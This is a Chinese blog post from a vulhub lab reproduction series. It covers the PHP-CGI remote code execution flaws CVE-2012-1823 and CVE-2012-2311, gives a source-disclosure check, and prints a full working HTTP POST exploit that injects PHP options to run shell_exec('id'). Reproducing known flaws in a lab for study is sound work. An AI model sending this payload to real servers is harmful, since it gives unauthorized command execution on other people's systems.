PHP-CGI远程代码执行漏洞（CVE-2012-1823&&CVE-2012-2311）

最新推荐文章于 2024-06-14 18:18:49 发布

小白萝卜

最新推荐文章于 2024-06-14 18:18:49 发布

阅读量513

点赞数

分类专栏： vulhub漏洞复现文章标签：安全

本文链接：https://blog.csdn.net/EC_Carrot/article/details/118879428

版权

vulhub漏洞复现专栏收录该内容

178 篇文章 29 订阅

订阅专栏

漏洞详细

详细务必请看：https://vulhub.org/#/environments/php/CVE-2012-1823/

影响版本

php < 5.3.12 or php < 5.4.2

漏洞复现

访问http://your-ip:8080/index.php?-s即爆出源码，说明漏洞存在，我们可以发送以下数据包来执行任意命令：

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: your_ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php echo shell_exec("id"); ?>

在这里插入图片描述

CVE-2012-2311

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

小白萝卜

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
PHP-CGI远程代码执行漏洞（CVE-2012-1823&&CVE-2012-2311）

漏洞详细详细务必请看：https://vulhub.org/#/environments/php/CVE-2012-1823/影响版本php < 5.3.12 or php < 5.4.2漏洞复现访问http://your-ip:8080/index.php?-s即爆出源码，说明漏洞存在，我们可以发送以下数据包来执行任意命令：POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input H
复制链接

扫一扫